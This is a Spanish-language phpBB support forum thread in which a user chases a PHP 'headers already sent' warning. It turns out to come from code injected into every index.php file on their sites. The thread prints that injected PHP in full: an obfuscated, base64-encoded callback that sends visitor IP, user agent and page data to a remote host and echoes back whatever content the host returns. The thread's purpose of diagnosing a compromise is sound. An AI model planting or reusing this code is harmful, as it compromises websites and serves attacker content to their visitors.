Código: Seleccionar todo
@define('PHPBB_INSTALLED', false);
// @define('DEBUG', false);
// @define('DEBUG_EXTRA', false);
?>
Recordad que para pedir soporte alguno, debéis facilitar los datos de soporte oportunos por favor, mirad aquí y leer las Normas generales del foro, esto nos servirá de ayuda para dar el mejor soporte..
Gracias.
La Administración de phpBB España.
@define('PHPBB_INSTALLED', false);
// @define('DEBUG', false);
// @define('DEBUG_EXTRA', false);
?>
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
Style by web design www, seo pozycjonowanie stron pozycjonowanie
Traducción al español por Huan Manwë para phpbb-es.com
phpBB SEO
[phpBB Debug] PHP Warning: in file /includes/session.php on line 1040: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:268)
en la parte de arriba en la cabecera, espera que tomo una captura...Alorse escribió:Yo no lo veo activado en tu foro, lo único que veo es esto:Código: Seleccionar todo
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group Style by web design www, seo pozycjonowanie stron pozycjonowanie Traducción al español por Huan Manwë para phpbb-es.com phpBB SEO
He comprobado y esta es la linea 268leviatan21 escribió:Si lo dices porque te aparece este error, el modo DEBUG no siempre está relacionado, que que tecnicamente no es un error del foro ( phpbb ) sino una advertencia del lenguaje de programación ( php )Código: Seleccionar todo
[phpBB Debug] PHP Warning: in file /includes/session.php on line 1040: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:268)
Por lo que se entiende de esa advertencia, tienes algún error en el archivo raíz/includes/hooks/index.php cercano a la linea 268 cosa que me llama la atención porque ese archivo original solo tiene 250 lineas, lo que hace suponer que de alguna manera fue modificado, y según tus datos de soporte ninguno de esos MODs requiere modificar ese archivo.
echo $sResult; // Statistic code end
Ese es el error, en phpbb si haces un echo generará ese tipo de advertencia.juanjo8995 escribió:He comprobado y esta es la linea 268
Como dije anteriormente, es una advertencia de php y no está relacionado con el foro o con el modo DEBUG.juanjo8995 escribió:De todas formas el problema es que se ha activado solo en todos mis foros y yo no he activado nada
Cuales son todos? porque no están en los datos de soporte.juanjo8995 escribió:Tengo todos los mods de phpbb-seo
Y adjunta comprimido con .zip o .rar, tu actual archivo raíz/includes/hooks/index.php y veremos si fue alterado por un hacker o noAlorse escribió:Intenta haciendo una copia de ese archivo y luego reemplazalo por el original de phpBB3 haber si te funciona.
?><?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
?>
Por experiencia propia en este asunto te diría que no busques mucho más allá del Wordpress. sobre todo si no es la última version hasta el momento ( 3.2.1 )juanjo8995 escribió:tengo unos 8 foros construidos en php otro en vbulletin otro site en html y otro con wordpress... la cosa es que hoy a las 6:39 gmt+1 todos los archivos llamados index.php de todas las carpetas de todos los foros, y todos los sites se han sobreescrito, añadiendo al final el siguiente codigo